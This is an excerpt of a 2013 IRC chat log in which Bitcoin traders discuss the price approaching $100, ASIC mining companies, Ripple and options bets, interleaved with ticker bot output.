goes to india or some shit. Mar 28 11:40:06 mircea_popescu: The big news for me is that the have or are working on a third batch, to bring total hashing to 200TH Mar 28 11:40:15 listen, that's not big news. Mar 28 11:40:20 good thing i don't work for you Mar 28 11:40:26 that's nonsense news. "sometime in the indefinite future BIG NUMBERS" Mar 28 11:40:28 getting a fight or flight feeling from this movement... Mar 28 11:40:29 not how business is done. Mar 28 11:40:38 shits gonna go down Mar 28 11:41:04 you guys don't really like this mining company? Mar 28 11:41:04 toffoo well, suppose you got a hot chick ready and willing and you kept her waiting february to april because you couldn't find a place. Mar 28 11:41:28 it just dun wash Mar 28 11:41:40 i hate when that happens Mar 28 11:41:47 bgupta i like the part where they're hashing. i dislike the part where i suspect they're lieing. Mar 28 11:42:53 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.3258973 = 325.8973 BTC [+] Mar 28 11:43:09 heh i like how the de-facto lot in options is 1k Mar 28 11:43:14 !ticker m ^oix Mar 28 11:43:15 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 61.30265123 / 81.54539345 / 81.56783226 (54813 shares, 7,964.16 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 28 11:44:10 Being someone who did a small scale GPU mining operation 2 years ago. I can say the power/cooling/space issues aren't something traditional ops managers can deal with, nor are traditional datacenters built for this kind of operation.. I had to get many additional power circuits pulled in. Mar 28 11:44:43 I know what they are doing is not trivial, considering that they aren't just mining Mar 28 11:45:04 intersting news that maybe avalon will deploy 3rd batch for their own mining operation Mar 28 11:45:24 leaving only bfl for the masses.. (if they ever ship) Mar 28 11:45:31 they will deploy 100 units for themselves Mar 28 11:45:34 probably Mar 28 11:45:40 dfl? Mar 28 11:45:42 since it used to be 600 units for pre order Mar 28 11:45:43 err bfl? Mar 28 11:45:49 no avalon Mar 28 11:45:51 bfl wont ship Mar 28 11:45:54 forget them Mar 28 11:46:22 ask the guy who bet 500 BTC on yes that BFL would ship by march 1st Mar 28 11:46:47 if bfl truly never ships, then asicminer is certainly undervalued.. Mar 28 11:47:11 avalon may need to step their game up Mar 28 11:47:20 I still find that challenging to believe they will never ship.. Mar 28 11:47:50 we may not need a "june betting thread for BFL" Mar 28 11:47:53 I'm wondering if their is a dark horse out there.. that we don't know about now. Mar 28 11:47:54 i have a feeling the asic race is something they'll be reading about in business school textbooks some day Mar 28 11:48:01 they will be exposed as a scam Mar 28 11:49:24 only in the loosest sense of the word Mar 28 11:50:50 "Niger $1,064,000,000.00 $97.44" Mar 28 11:50:57 bear in mind all of these companies are rank amateurs muddling their ways through this.. companies like amd/intel/ti they would have shipped. Mar 28 11:50:58 Wtf. didnt know they had that much Mar 28 11:51:36 bgupta this isn't gpu mining. Mar 28 11:51:37 asics. Mar 28 11:52:01 the total specified power draw is something like 10kw Mar 28 11:52:08 say they actually need 20. 20kw is NOT a big deal. Mar 28 11:52:24 I understand.. this would have been mickey mouse work, for the big silicon companies. Mar 28 11:52:39 no, this would have been mickey m,ouse work for my neighbour, who never went to college Mar 28 11:52:59 but he has a 32kw line installed because he has a pump and whatever other shit Mar 28 11:54:04 toffoo i guess pretty much everything we do in bitcoin these early days will become revered a century later. Mar 28 11:55:08 u will be known as hosting the biggest btc exchange Mar 28 11:55:16 and also for hosting a porn site Mar 28 11:55:17 lol Mar 28 11:55:37 haha o hey, i just realised : i got it easy Mar 28 11:55:44 i'll go down in history as "the only romanian that ever..." Mar 28 11:55:58 kinda sucks being from the uk for this purpose. Mar 28 11:56:16 btcQuick seems scammy Mar 28 11:57:09 err.. google checkout? they don't think that once google gets wind of it they won't just shut it down Mar 28 11:57:33 and it's reversable. Mar 28 11:57:40 that mpex buttpen pic would show up as one of the most powerful examples of btc Mar 28 11:57:43 they apparently won a chargeback... apparently... Mar 28 11:57:46 is the word Mar 28 11:58:27 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.32597223 = 325.9722 BTC [+] Mar 28 11:58:48 Bitfunder has an asset bot in #bitfunder now. I hope to see it added to assbot soon Mar 28 11:58:52 not as bad though as ziggap... Mar 28 11:59:02 What's up with ziggap? Mar 28 11:59:23 https://bitcointalk.org/index.php?topic=146611.0 Mar 28 11:59:28 afaik aethero's thing neh ? Mar 28 11:59:46 yeah Mar 28 11:59:51 So? As far as I know, it's doing okay. Mar 28 12:00:42 Aren't they basically at risk of being shut down for failing to register as a financial institution? Mar 28 12:00:51 [BTCTC] [ASICMINER-PT] 1 @ 0.728 BTC [-] Mar 28 12:00:53 [BTCTC] [ASICMINER-PT] 1 @ 0.726 BTC [-] Mar 28 12:00:55 [BTCTC] [ASICMINER-PT] 20 @ 0.725 = 14.5 BTC [-] Mar 28 12:01:07 Where is aethero located? Mar 28 12:01:37 I saw mention of Bank of America? Mar 28 12:01:46 bgupta everyone with the notable exception of bitcoin-central is. Mar 28 12:01:59 this includes mthox, coin*, cavirtex, you name it. Mar 28 12:02:08 some people are working with it, some people aren't, but licenses nobody has. Mar 28 12:03:09 The law, so far, doesn't care much about Bitcoins... Mar 28 12:03:09 "ZigGap is made up of a team of dedicated Bitcoin service professionals located in the eastern United States." Mar 28 12:03:15 It seems... Mar 28 12:03:40 coin* lol Mar 28 12:03:44 And according to lawyers that were consulted, there's not much yet... Mar 28 12:03:51 I believe Mar 28 12:03:53 I'm concerned about an USA based btc business that exchanges fiat for btc.. Mar 28 12:04:03 Ask Ukto or Burnside, both in the USA Mar 28 12:04:13 and running a BTC asset exchange Mar 28 12:04:20 Burnsides incorporated somewhere else. Mar 28 12:04:30 Namworld you're confusing things tho. burnside isn't touching fiat afaik. Mar 28 12:04:32 some island nation Mar 28 12:04:45 yeah, he took another approach. Ukto is in the USA tho I believe. Mar 28 12:05:05 Barbados maybe? Mar 28 12:05:11 Ah yes, burnside doesn't touch fiat. Mar 28 12:05:16 no Belize Mar 28 12:05:16 Belize Mar 28 12:05:32 Assuming he did his homework there. Mar 28 12:06:45 Belize is on of those "Offshore Banking" countries that doesn't really deal well with the US Mar 28 12:07:53 https://bitcointalk.org/index.php?topic=159935.0 win Mar 28 12:08:13 well technically I don't think burnside deals in USD? Why would he have to? Mar 28 12:09:21 citation needed Mar 28 12:09:42 tiberiusiv: sigh.. wtf are you talking about.. you just jumped into a convo.. Mar 28 12:09:48 brb Mar 28 12:10:21 pigeons screenshot good enough neh ? Mar 28 12:12:53 mircea_popescu: talking to tiberiusiv, maybe you have him on ignore, i was considering it Mar 28 12:14:03 yeah i think we've all heard that tiberiusiv Mar 28 12:14:12 o Mar 28 12:15:04 the only thing more boring than listening to how great mp is, is listening to how bad he is Mar 28 12:15:41 i'm not boring ;/ Mar 28 12:16:16 pigeons by the way, i wish to know why isn't ripple whipping the otc btc/usd traders into a huge behemoth of fury that wrests currency exchange from mtgox ? Mar 28 12:16:34 NEVER a better opportunity could have come their way, this is what ripple is for right ? why's it not doing it! Mar 28 12:16:37 cause its beta and there are bugs but it is Mar 28 12:16:48 i don't see it ? am i not looking right ? Mar 28 12:17:03 [HAVELOCK] [VTX] 20 @ 0.495 = 9.9 BTC [-] Mar 28 12:17:41 haven't followed ripple too closely yet.. Mar 28 12:17:49 well me either, but i think he does. Mar 28 12:17:52 something to pay attention to? Mar 28 12:18:23 i dunno. Mar 28 12:18:23 I kinda feel like btc is where it's at.. alternacoins don't interest me.. Mar 28 12:18:45 it's not exactly an altcoin tho. it's a sort of - as best i can determine - blockchain-y iou management system Mar 28 12:18:48 liquidity in btc is bad enough as it is.. Mar 28 12:19:01 mircea_popescu: you cant know from looking at a ripple address that the btc or fiat balances are markers for funds at the liquidity pools behind the exchanges, or if they are worthless ious unless you are in the pools Mar 28 12:19:02 I see. Mar 28 12:19:07 bgupta https://twitter.com/Mircea_Popescu/status/317213908769325056 check that Mar 28 12:19:24 yeah, I saw that.. Mar 28 12:19:28 1bn baby Mar 28 12:19:40 i drank so much champagne this month ;/ Mar 28 12:19:42 well not your twitter post but the total value. Mar 28 12:19:45 we're just getting started Mar 28 12:19:50 its like baby steps for btc Mar 28 12:19:59 uguu~ Mar 28 12:20:02 [HAVELOCK] [VTX] 20 @ 0.49 = 9.8 BTC [-] Mar 28 12:20:20 !ticker h vtx Mar 28 12:20:22 [HAVELOCK:VTX] 1D: 0.47999991 / 0.54371502 / 0.59500000 (243 shares, 132.12274963 BTC), 7D: 0.38280000 / 0.4265498 / 0.79900000 (11528 shares, 4917.26606448 BTC), 30D: 0.38280000 / 0.42674388 / 0.79900000 (11652 shares, 4972.41966448 BTC) Mar 28 12:21:16 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.32784 = 327.84 BTC [+] Mar 28 12:21:36 mircea_popescu: oh i see you were asking why ripple's decentralized trading hasnt replaced centralised exchanges like mtgox Mar 28 12:21:43 yes! Mar 28 12:21:58 there's some strength in the otc market, and they're doing things mostly pen on paper. Mar 28 12:22:05 why isn't this thing empowering the otc to take over! Mar 28 12:22:46 how new is ripple? Mar 28 12:22:50 ~6 months ? Mar 28 12:23:04 main reason is client software is buggy beta, trust of potential users is low so far, server software is in flux, protocol changes so no server source yet except for partners so no decentralization yet Mar 28 12:23:16 pigeons who exactly is doing ripple ? Mar 28 12:23:26 bgupta: ryan fugger started the ripple concept in 2006 i think Mar 28 12:23:27 i ddin't realise it's a closed source model Mar 28 12:23:58 jed mcaleb who started mtgox started a company to buy ripple from ryan Mar 28 12:24:08 lol Mar 28 12:24:34 so basically a lot of owners, no strategist, no capital and so forth. Mar 28 12:24:43 it is open source model, client is open, server source not open yet, but breaking changes coming every few days so source when stable Mar 28 12:24:43 95.7 we have had so many aths end at .70 or .778 Mar 28 12:25:23 mircea_popescu: they have strategy and capital, wether the strategy is any good remains to be seen Mar 28 12:25:33 reading: http://p2pfoundation.net/Ripple Mar 28 12:25:44 -= Galaxy 1 - 20nm ASIC Announcement =- Mar 28 12:25:47 is this shit for real Mar 28 12:25:49 20mm asic Mar 28 12:26:00 bowjob that was ages ago and lol no Mar 28 12:26:07 20mm are you on crack? lol Mar 28 12:26:09 Bowjob if it's real it'd be good. Mar 28 12:26:14 bgupta: yes but when bitcoin people currently talk about ripple they presently usually mean jed's opencoin inc implementation at ripple.com Mar 28 12:26:24 its on the mining forum lol Mar 28 12:26:42 "We have to keep our Intellectual Property protected and abide by NDA we have signed with chip manufactures so please understand that there are some things that I can't divulge, but I will try my best to answer any questions that you may have. Mar 28 12:26:42 BTW, I am not an electrical engineer so give me a break on that. I am CEO." Mar 28 12:26:43 scam. Mar 28 12:27:03 toffoo thanks for the e-mail, let me know what he says if he does :/ Mar 28 12:27:10 i was disappointed with PrimeASic too Mar 28 12:27:24 if that shit turned out to be real, i'd pay hungary a visit Mar 28 12:27:44 its a scam now obviously Mar 28 12:27:58 mp ithe 200 th should arive in 3 months, will take the same time as the first two orders Mar 28 12:28:18 it is pretty big news cuz it will kill everyone even if bfl is real Mar 28 12:28:31 ;;asks 99.999 Mar 28 12:28:33 There are currently 11188.557 bitcoins offered at or under 99.999 USD, worth 1095083.52263 USD in total. | Data vintage: 0.0016 seconds Mar 28 12:28:44 So would it be fair to say that Ripple is like the US checking system, but instead of banks and the government backing it, it is all WoT based? Mar 28 12:28:50 that is 55% of what it was 2 hours ago Mar 28 12:30:20 bfl_josh has 3 days before he perform a seppuku ritual Mar 28 12:31:03 bgupta: i think the innovation is the "rippling" of these ious across trust paths, Mar 28 12:31:11 [BTCTC] [BASIC-MINING] 8 @ 0.37 = 2.96 BTC [+] Mar 28 12:31:35 https://bitcointalk.org/index.php?topic=158807.msg1691388#msg1691388 Mar 28 12:31:44 in which usagi shows his mad c++ skills Mar 28 12:31:50 apparently some sort of game developer. Mar 28 12:31:51 Chaang-Noi read a little further down, he did reply Mar 28 12:32:01 wow i have everyone in that thread ignored Mar 28 12:32:11 ahahaha Mar 28 12:32:20 i am sorry pigeons. Mar 28 12:32:56 http://upload.wikimedia.org/wikipedia/commons/5/5b/Wakisashi-sepukku-p1000699.jpg Mar 28 12:34:52 toffoo then it is what i thought, if ture, they are remodeling the new data center Mar 28 12:35:11 atleast he has pil;es of btc now to get shit done Mar 28 12:35:41 anyone going to celebrate 100? or the fact we went over 1billion market cap? Mar 28 12:36:02 [HAVELOCK] [VTX] 5 @ 0.49 = 2.45 BTC [-] Mar 28 12:36:10 prolly won't have any trouble selling a few for RMB in this market right now either Mar 28 12:36:19 yeah Mar 28 12:37:15 fellow AM shareholders, I have a feeling we'll be reuniting on yachts together some day Mar 28 12:37:33 yeah i think so too Mar 28 12:37:56 do you hold a large amount toffoo? Mar 28 12:38:13 prolly not as large as i'd like to Mar 28 12:38:44 lol, well me too Mar 28 12:38:44 heck having just 20 BTC can make you a king Mar 28 12:39:07 but thru dumb luck or being lucky dumb i wound up having more than i ordinarily would have Mar 28 12:39:11 we cant all be a king Mar 28 12:39:27 how is that toffoo? Mar 28 12:39:41 well how many users have more than 100 BTC Mar 28 12:39:52 in relation to the rest of the world Mar 28 12:39:58 id say 95% of this chan Mar 28 12:40:21 we're pretty much the new banking overlords Mar 28 12:40:26 oh, well 20 btc at $10,000 each is only half a house in the usa... Mar 28 12:40:45 not exactly a king and we are not yet near $10k usd each Mar 28 12:40:53 well.. Mar 28 12:41:01 btc can go way more than 10k Mar 28 12:41:02 hell my uncle has a car worth that... he is not a king Mar 28 12:41:10 maybe :) Mar 28 12:41:33 houses in vancouver are around 1m upwards Mar 28 12:41:44 1m gets you a small midsized house Mar 28 12:42:05 yeah.. so at $100k usd a coin you have 2 houses Mar 28 12:42:15 not really a king :/ Mar 28 12:42:33 theres taxes too i guess Mar 28 12:42:49 not until you sell them right? Mar 28 12:42:52 now at 1,000k a coin okay, he got some walking money Mar 28 12:43:01 yeah toffoo Mar 28 12:43:06 i plan on using btc directly Mar 28 12:43:23 me to, but not in the usa (or canada) Mar 28 12:43:27 if I can, id try to set up a mining ops Mar 28 12:43:36 starting with 1 avalon, then gen 2, ect Mar 28 12:43:59 id get a diminishing return, but if the value of btc goes up, i'll be living comfortably Mar 28 12:46:03 if we're fast with this "bitcoin crosses $1bn" headline thru the tech news cycle before the weekend we could blow thru $100 no problemo Mar 28 12:46:35 you really need 10000+ btc today to have any say tomorrow, and bear in mind at some point a continuing major rise of the btc value versus fiat (which is not a given) would have to have an impact of the buying power of the fiat currencies. Mar 28 12:47:55 we will correct sooner or later, we are correcting up now, we were way undervalued for so long, we will shoot too high and go back down, level and shooot up again Mar 28 12:48:23 ;;asks 96 Mar 28 12:48:26 There are currently 3068.6381 bitcoins offered at or under 96.0 USD, worth 293644.877472 USD in total. | Data vintage: 0.0013 seconds Mar 28 12:48:37 we're at 95 Mar 28 12:48:39 not bad Mar 28 12:48:40 i dont think we will hit 100 before i have to go out in a few hours Mar 28 12:48:52 [BTCTC] [BASIC-MINING] 2 @ 0.37 = 0.74 BTC [+] Mar 28 12:50:40 is gribble a bot? Mar 28 12:50:56 who's bot? Mar 28 12:51:58 mircea_popescu: any idea who's bot gribble is? Mar 28 12:52:40 [BTCTC] [COG.F] 1 @ 2.499 BTC [-] Mar 28 12:52:43 [BTCTC] [COG.F] 1 @ 2.499 BTC [-] Mar 28 12:52:46 [BTCTC] [COG.F] 1 @ 2.499 BTC [-] Mar 28 12:52:48 [BTCTC] [COG.F] 3 @ 2.5 = 7.5 BTC [+] Mar 28 12:52:53 bgupta: its nanotube's Mar 28 12:55:40 so any quesses when we are gonna switch to talking in mBTC? Mar 28 12:56:38 never? Mar 28 12:56:58 or maybe after retailers force us? Mar 28 12:57:30 WEll, if one can buy a house with 1BTC, I'd imagine it would be an unwieldy unit of transaction. Mar 28 12:57:55 Don't think it will ever get there.. Mar 28 12:58:06 [BTCTC] [COGNITIVE] 3 @ 0.135 = 0.405 BTC [-] Mar 28 12:58:17 yeah i dont know Mar 28 12:58:30 gold is 1.6k a troy oz Mar 28 12:58:31 I'd guess when we break 1000, and an mBTC is worth $1.. Mar 28 12:58:40 we could use gram or tonne i guess Mar 28 12:59:06 ha! Mar 28 12:59:10 Well.. gold isn't used in commerce as payment Mar 28 12:59:16 I wake up and it is 95 Mar 28 12:59:18 great Mar 28 12:59:22 [BTCTC] [B.YABMC] 1 @ 0.011 BTC [-] Mar 28 12:59:23 :) Mar 28 12:59:26 it's a commodity Mar 28 12:59:35 bgupta in thailand it is Mar 28 12:59:43 btc trades like a commodity/currency/equity Mar 28 12:59:50 the unit we use is called a "baht" or "stang" Mar 28 12:59:54 party when it hits triple digits Mar 28 13:00:03 how much does it weigh? Mar 28 13:00:08 i gotz champagne on ice Mar 28 13:00:25 one baht is a bit less than 1/2 a troy ounce Mar 28 13:00:28 one stang is 1/4 a baht Mar 28 13:00:40 ;;bids 0 Mar 28 13:00:40 There are currently 34720787 bitcoins demanded at or over 0.0 USD, worth 9480373.83494 USD in total. | Data vintage: 2.6506 seconds Mar 28 13:00:59 Chaang-Noi: http://en.wikipedia.org/wiki/Thai_baht not sure I follow seems it's paper? Mar 28 13:01:08 the currancy you use to buy women here for wives is gold Mar 28 13:01:42 bgupta google gold baht Mar 28 13:01:54 1 Thai Baht equals 0.03 US Dollar. ok will do Mar 28 13:02:30 chang can you actually speak thai Mar 28 13:02:33 ah it's like india Mar 28 13:02:48 jewelry as currency for things like dowry and what not Mar 28 13:02:48 bgupta nanotube controls gribble Mar 28 13:02:50 yes i can speak thai and i will find you a link... Mar 28 13:03:06 why is it that white people are so good at asian languages Mar 28 13:03:10 not the other way around lol Mar 28 13:03:18 ;;asks 99.8 Mar 28 13:03:21 There are currently 11965.864 bitcoins offered at or under 99.8 USD, worth 1169623.7288 USD in total. | Data vintage: 0.0015 seconds Mar 28 13:04:02 [HAVELOCK] [VTX] 4 @ 0.49999 = 2 BTC [+] Mar 28 13:04:20 Bowjob european tradition. Mar 28 13:04:22 http://wiki.answers.com/Q/How_many_grams_is_1_thai_baht_gold Mar 28 13:04:23 white man speaks languages. Mar 28 13:04:32 keep yo eyes open Mar 28 13:04:57 most people speak english here Mar 28 13:05:10 roadsigns and shit are in english, not thai Mar 28 13:05:15 hey Bugpowder how much did you risk on that option trade? Mar 28 13:05:27 ASEAN is english Mar 28 13:05:35 yeah bugpowder must be floating in cash Mar 28 13:06:26 did you go all in or just risk a % of your acc Mar 28 13:07:23 i dobut he went even close to all in Mar 28 13:09:07 thats good Mar 28 13:09:40 bgupta: Bots should have a dogtag function..they're so friendly..people always messin with em..they could get lost.. Mar 28 13:09:53 :) Mar 28 13:10:09 gribble: do you know who your owner is? Mar 28 13:10:27 someone wanna buy capture mtgox data? Mar 28 13:10:32 i guess you guys have it all anyway Mar 28 13:10:39 captured Mar 28 13:10:46 bugpowder: didnt you say price was going to peak today or was that someone else Mar 28 13:11:00 Maybe Thick? Mar 28 13:11:03 [HAVELOCK] [VTX] 3 @ 0.49999 = 1.5 BTC [+] Mar 28 13:11:43 ;;ident gribble Mar 28 13:11:44 Nick 'gribble', with hostmask 'gribble!~gribble@unaffiliated/nanotube/bot/gribble', is not identified. Mar 28 13:11:48 SO interesting observation.. at this point over 13% of the outstanding asicminer shares are being traded through PTs Mar 28 13:11:50 he kinda DOES have a dogtag Mar 28 13:12:08 bgupta there seems to be something magic about 13% Mar 28 13:12:19 sdice is 13%, mpoe is 12.whatever Mar 28 13:12:32 well it was like 3% a few days ago Mar 28 13:12:36 i would guess bitbet is maybe around there Mar 28 13:12:50 I got 6000 calls Mar 28 13:12:55 well more than a few.. Mar 28 13:13:02 Bugpowder: which ones? Mar 28 13:13:22 590, 610, 630, 710, 730, 750 Mar 28 13:13:49 what are they options for? Mar 28 13:13:59 BTCUSD Mar 28 13:14:00 options to buy what I mean Mar 28 13:14:09 when do they expire? Mar 28 13:14:09 yeah it would be cool if gribble could tell ya Mar 28 13:14:14 this is answering taub's quiestion Mar 28 13:14:20 tomorrow night Mar 28 13:14:21 its been almost 10 years since i programmed an eggdrop bot Mar 28 13:14:36 yah dudes Mar 28 13:14:39 1.5 million usd to clear 100 hmmm not before bed :/ Mar 28 13:14:42 bitcar is definitely happening Mar 28 13:15:03 [HAVELOCK] [SDICE] 2 @ 0.39 = 0.78 BTC [-] Mar 28 13:15:26 bitcar? Mar 28 13:15:39 I'm missing something? You are betting that btc will hit 590, in the next 24 hours? (Don't trade the currency options, so not sure the pricing.) Mar 28 13:15:47 http://www.theblaze.com/stories/2013/03/28/hundreds-of-armed-vigilantes-seize-mexican-town-arrest-local-police/ Mar 28 13:15:47 dont buy a car with btc Mar 28 13:15:49 i made that mistake Mar 28 13:15:49 for the lolz Mar 28 13:15:52 it doesnt work Mar 28 13:15:59 bgupta 59 Mar 28 13:16:08 oh nice Mar 28 13:16:10 id be rining a helicopter now Mar 28 13:16:20 working on bithouse Mar 28 13:16:21 riding Mar 28 13:16:38 bgupta old scheme needed the decimals because when mpoe was born btc was trading at 5 threatening 2 Mar 28 13:17:03 we're gonna move on a new naming convention after tomorrow Mar 28 13:21:03 [HAVELOCK] [VTX] 1 @ 0.49999 BTC [+] Mar 28 13:22:54 lol arrest the police Mar 28 13:23:25 kakobrekla why not? i was thinking about it Mar 28 13:23:58 dunno Mar 28 13:24:02 [HAVELOCK] [SDICE] 1 @ 0.3803 BTC [-] Mar 28 13:24:07 id be dirving a helicopter now Chaang-Noi Mar 28 13:24:19 oh lol Mar 28 13:24:22 gotcha Mar 28 13:24:22 you started right after the '11 crash? Mar 28 13:24:46 but if i was going to get one anyway:) Mar 28 13:25:03 [HAVELOCK] [VTX] 1 @ 0.49999 BTC [+] Mar 28 13:25:41 man.. this is the second time my ipod touch went tumble drying Mar 28 13:25:43 i feel bad now Mar 28 13:25:45 :/ Mar 28 13:26:21 yeah Mar 28 13:26:27 it wold be like kako dotcom Mar 28 13:26:29 with the heli Mar 28 13:26:35 You guys hear about this? http://rbth.ru/business/2013/03/25/russia_to_ban_cash_transactions_over_10000_24203.html Mar 28 13:26:42 yup Mar 28 13:26:54 its a perfect storm Mar 28 13:26:58 for bitcoin Mar 28 13:27:22 KRS1: It could top today or tomorrow, but I think 100 will be a magnet Mar 28 13:27:36 suck the price upwards to it, as people want to get in before 100 Mar 28 13:27:52 http://www2.egovlink.com/press-release-bitcoin.cfm Mar 28 13:28:16 and there is no wall big wall there Mar 28 13:28:30 kako i have a feeling you are still doing well in btc land:) Mar 28 13:29:39 ;;asks 100 Mar 28 13:29:42 There are currently 15089.844 bitcoins offered at or under 100.0 USD, worth 1482299.95625 USD in total. | Data vintage: 0.0016 seconds Mar 28 13:31:53 http://www.businessweek.com/articles/2013-03-28/bitcoin-may-be-the-global-economys-last-safe-haven Mar 28 13:32:09 keelin over Mar 28 13:32:09 ;) Mar 28 13:32:19 toffoo can you ask friedcat an eta for it being done? Mar 28 13:35:07 [BTCTC] [PAJKA.BOND] 1 @ 0.07 BTC [-] Mar 28 13:36:09 —something memorable and fun, like 1Ns17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L Mar 28 13:36:12 oh lol Mar 28 13:37:14 "Bitcoin is a hedge against the entire global currency system." nice line Mar 28 13:39:03 [HAVELOCK] [VTX] 11 @ 0.481 = 5.291 BTC [-] Mar 28 13:39:04 [HAVELOCK] [VTX] 5 @ 0.48 = 2.4 BTC [-] Mar 28 13:39:05 [HAVELOCK] [VTX] 10 @ 0.4799999 = 4.8 BTC [-] Mar 28 13:39:49 [BTCTC] [ASICMINER-PT] 1 @ 0.721 BTC [-] Mar 28 13:40:30 [BTCTC] [ASICMINER-PT] 2 @ 0.72 = 1.44 BTC [-] Mar 28 13:41:23 wow that is a really well written article Mar 28 13:41:34 fair and entertaining Mar 28 13:41:39 great for mainstream readers Mar 28 13:41:45 I'm going to post this one Mar 28 13:42:07 yeah its good Mar 28 13:42:35 i love that line i quoted, its in my sig now Mar 28 13:43:25 [BTCTC] [PAJKA.BOND] 1 @ 0.1078 BTC [+] Mar 28 13:43:36 well boys, sadly i must go eat steak and drink lots and lots of beer, if we get close to 100 ill be back, if not, good trading:) Mar 28 13:45:23 goodbye Mar 28 13:45:56 Any idea when the bubble will pop? Mar 28 13:46:15 [BTCTC] [PAJKA.BOND] 4 @ 0.1 = 0.4 BTC [-] Mar 28 13:46:47 [BTCTC] [PAJKA.BOND] 1 @ 0.104 BTC [+] Mar 28 13:47:22 [BTCTC] [PAJKA.BOND] 3 @ 0.104 = 0.312 BTC [+] Mar 28 13:48:42 nope Mar 28 13:48:58 just imagine if this becomes a mainstream bubble Mar 28 13:49:09 instead of a niche bubble Mar 28 13:49:45 i should probabky stopselling coins Mar 28 13:51:53 [BTCTC] [ASICMINER-PT] 6 @ 0.72 = 4.32 BTC [-] Mar 28 13:52:31 In my opinion, it's not close to popping. but it's just a probabilistic event Mar 28 13:52:50 idk bro, everybody is shaking as we go up to 100 Mar 28 13:53:04 and we haven't had a proper retracement since 60 Mar 28 13:53:27 good news are on mainstream news every day. and we are going up Mar 28 13:54:06 i want to see retracement and consolidation on good news. when people get used to that btc>80 Mar 28 13:55:10 oh, bitcoin reached 1b market cap today Mar 28 13:55:29 ;;ticker Mar 28 13:55:30 BTCUSD ticker | Best bid: 94.14508, Best ask: 94.50000, Bid-ask spread: 0.35492, Last trade: 94.50000, 24 hour volume: 65617.39331966, 24 hour low: 85.35000, 24 hour high: 95.70000, 24 hour vwap: 89.83651 Mar 28 13:55:44 ;;bc,mktcap Mar 28 13:55:45 1035722362.5 Mar 28 13:56:58 so curious question.. how much fiat value in USD do folks think people have taken out of btc and have on hand (largely I'm thinking about early owners, but any one really who's taken some profits would count here) Mar 28 13:57:24 ;;bids 0 Mar 28 13:57:27 There are currently 34625409 bitcoins demanded at or over 0.0 USD, worth 9449688.47191 USD in total. | Data vintage: 0.0187 seconds Mar 28 13:58:09 IE: I'm wondering how much fiat there is on hand for trading from active traders. Mar 28 13:58:28 i'd wonder more about the coins Mar 28 13:58:41 new people bring in fiat Mar 28 13:58:45 bgupta: look at what i just typed in Mar 28 13:58:49 at least 10M Mar 28 13:59:22 ah.. but it must be more than that Mar 28 13:59:24 those are funded bids Mar 28 13:59:26 yeah Mar 28 13:59:30 but how much more Mar 28 13:59:34 25% or 200%? Mar 28 14:00:11 Mid-cap: $2 billion.$10 billion Mar 28 14:00:12 Small-cap: $250 million.$2 billion Mar 28 14:00:14 well, getting there Mar 28 14:00:15 no news yet on btc billion milestone Mar 28 14:00:24 (no press that is) Mar 28 14:02:51 [BTCTC] [B.YABMC] 1 @ 0.008551 BTC [-] Mar 28 14:05:09 hmm market cap, I like bids >0 better, perhaps an inter-exchange 'bids 0' USD would be even better. Mar 28 14:05:14 OH SHIT! Bitcoins hit the header of http://drudgereport.com Mar 28 14:07:09 MARC FABER: Not Even Gold Will Be Able To Save You From What Is Coming Mar 28 14:07:09 Read more: http://www.businessinsider.com/faber-gold-wont-be-a-place-to-hide-2013-3#ixzz2OprdT6ba Mar 28 14:07:14 this dude always gives me the creeps Mar 28 14:07:23 i mean with his predictions, depressing Mar 28 14:08:58 93.5 its going to zero Mar 28 14:15:35 Bugpowder must be rich Mar 28 14:15:40 your bet is paying off huge Mar 28 14:15:54 ;;bc,24hprc Mar 28 14:15:55 89.71 Mar 28 14:16:00 bajeezus Mar 28 14:16:33 ;;calc (89.71 - 75)/75 Mar 28 14:16:33 0.196133333333 Mar 28 14:16:39 holy fucking shit Mar 28 14:16:56 200%?!?!?!?! Mar 28 14:17:09 I should have bought more Mar 28 14:17:11 !ticker m S.MPOE Mar 28 14:17:12 [MPEX:S.MPOE] 1D: 0.00060077 / 0.0006081 / 0.00061253 (48495 shares, 29.49 BTC), 7D: 0.00060001 / 0.00067102 / 0.00073756 (1745269 shares, 1,171.12 BTC), 30D: 0.00060001 / 0.00073593 / 0.00078628 (16750478 shares, 12,327.29 BTC) Mar 28 14:17:18 we all should have Mar 28 14:17:31 im fearful of mpoe crashing this month... Mar 28 14:17:47 if there is no bondholder loss... Mar 28 14:17:57 then mpoe might shoot back up Mar 28 14:18:19 i really don't see how bondholders are going to avoid a loss at this point Mar 28 14:19:11 do you think it could crash like that bet? Mar 28 14:19:22 that bitbet Mar 28 14:19:27 nah Mar 28 14:19:36 bitbet revenue is much much smaller Mar 28 14:19:49 mpoe has a proven business model that prints bitcoins Mar 28 14:20:06 HAHAHAHA Mar 28 14:20:13 omg that has made my morning Mar 28 14:20:14 they just have had a very bad month due to the directionality of the move Mar 28 14:20:22 i <3 Bugpowder Mar 28 14:20:50 I like S.MPOE for long term Mar 28 14:20:59 thats why i am holding it Mar 28 14:21:44 i want to buy more on a decrease, but I dont want to see a month similar to August 2012 Mar 28 14:21:46 BBET might work out long term, but .002 is awfully rich. It assumes very high growth rates sustained over long periods Mar 28 14:22:15 You won't lose money from a zero dividend Mar 28 14:22:23 but you might lose capital value Mar 28 14:22:37 Why not set a cheap bid below the current price Mar 28 14:23:57 When the financials are posted Mar 28 14:24:04 pay attention and make a quick move Mar 28 14:25:11 [BTCTC] [B.YABMC] 1 @ 0.01965 BTC [+] Mar 28 14:25:29 [08:16] ;;calc (89.71 - 75)/75 Mar 28 14:25:32 for calls? Mar 28 14:25:34 [BTCTC] [B.YABMC] 2 @ 0.01966 = 0.0393 BTC [+] Mar 28 14:25:49 ;;calc (89.71 - 75)/89.71 Mar 28 14:25:50 0.163972801248 Mar 28 14:25:53 my bad Mar 28 14:25:59 ;;ticker Mar 28 14:26:01 BTCUSD ticker | Best bid: 92.34162, Best ask: 92.50000, Bid-ask spread: 0.15838, Last trade: 92.30000, 24 hour volume: 66928.10223158, 24 hour low: 85.35000, 24 hour high: 95.70000, 24 hour vwap: 90.01309 Mar 28 14:26:05 thanks for pointing out error Mar 28 14:26:06 Slightly worse off... but good nevertheless Mar 28 14:26:30 vwap is still rising and will for the next few hours at the very least Mar 28 14:27:17 yeah Mar 28 14:31:37 is 